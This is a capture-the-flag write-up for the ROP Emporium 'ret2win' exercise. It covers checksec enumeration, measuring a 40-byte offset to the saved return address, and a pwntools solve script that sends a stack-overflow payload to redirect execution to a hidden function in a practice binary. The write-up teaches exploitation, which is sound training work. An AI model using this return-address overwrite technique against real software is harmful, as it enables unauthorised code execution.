Skip to content

ret2win

Locate a method that you want to call within the binary. Call it by overwriting a saved return address on the stack.

Enumeration

Checksec:

1
2
3
4
5
6
7
8
pwndbg> checksec
File:     /home/admin/sboxshare/ropemporium/ret2win/ret2win
Arch:     amd64
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
Stripped:   No
  • No canary: Makes buffer overflow exploits and stack smashing possible.
  • NX: The stack isn't executable. Injecting shellcode won't work.
  • PIE*: No address space randomization. Symbol addresses won't change between executions.

When run, the program asks for user input:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
$ ./ret2win 
ret2win by ROP Emporium
x86_64

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Thank you!
Segmentation fault (core dumped)

The program crashes, but as mentioned in the guide, there is a ret2win function in the binary that will call system() to print the contents of the flag. This function isn't called from anywhere, but it can be reached by overwriting the return address with its address and calling ret.

Attack

The program mentions that the input is stored in a 32 byte buffer. This can be confirmed by running the program with a pattern that's easy to search for, and calculating the distance in memory between the pattern and the return address:

1
2
3
4
5
6
7
8
9
pwndbg> i f
...
 Saved registers:
  rbp at 0x7fffa26635f0, rip at 0x7fffa26635f8
pwndbg> search ABA
Searching for byte: b'ABA'
[stack]         0x7fffa26635d0 0xa414241 /* 'ABA\n' */
pwndbg> distance 0x7fffa26635d0 0x7fffa26635f0
0x7fffa26635d0->0x7fffa26635f0 is 0x20 bytes (0x4 words)

There is 0x20 (32) bytes between the start of the input buffer and the return address of the function invoking read().

Important

The distance measured is up until the frame base pointer (RBP). To successfully redirect execution, the return address stored at RBP + 8 has to be overwritten with the address of the ret2win function. This means that the total payload has to contain 40 bytes of padding, and not just 32.

Since the binary includes a function that carries out all the necessary steps for reading the flag, there isn't any need to build a long ROP chain to get to the flag. A sufficient payload is just a ret instruction to return from the pwnme function and then the address of ret2win.

A ret instruction is available at 0x40053e (using ropper). The full payload is:

1
2
3
4
5
...
ret = p64(0x40053e)
ret2win = p64(elf.symbols['ret2win'])
p.sendlineafter(b'> ', b'A'*40 + ret +  ret2win)
...

Attack Script

solve.py 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
exe = "./ret2win"
elf = context.binary = ELF(exe)
rop = ROP(elf)
gdbscript = '''
b *pwnme+97
c
'''

if args.LOCAL:
    p = process(elf.path)
    if args.GDB:
        gdb.attach(p, gdbscript=gdbscript)

ret = p64(0x40053e)
ret2win = p64(elf.symbols['ret2win'])
p.sendlineafter(b'> ', b'A'*40 + ret +  ret2win)
p.recv()
print(p.recvline().decode())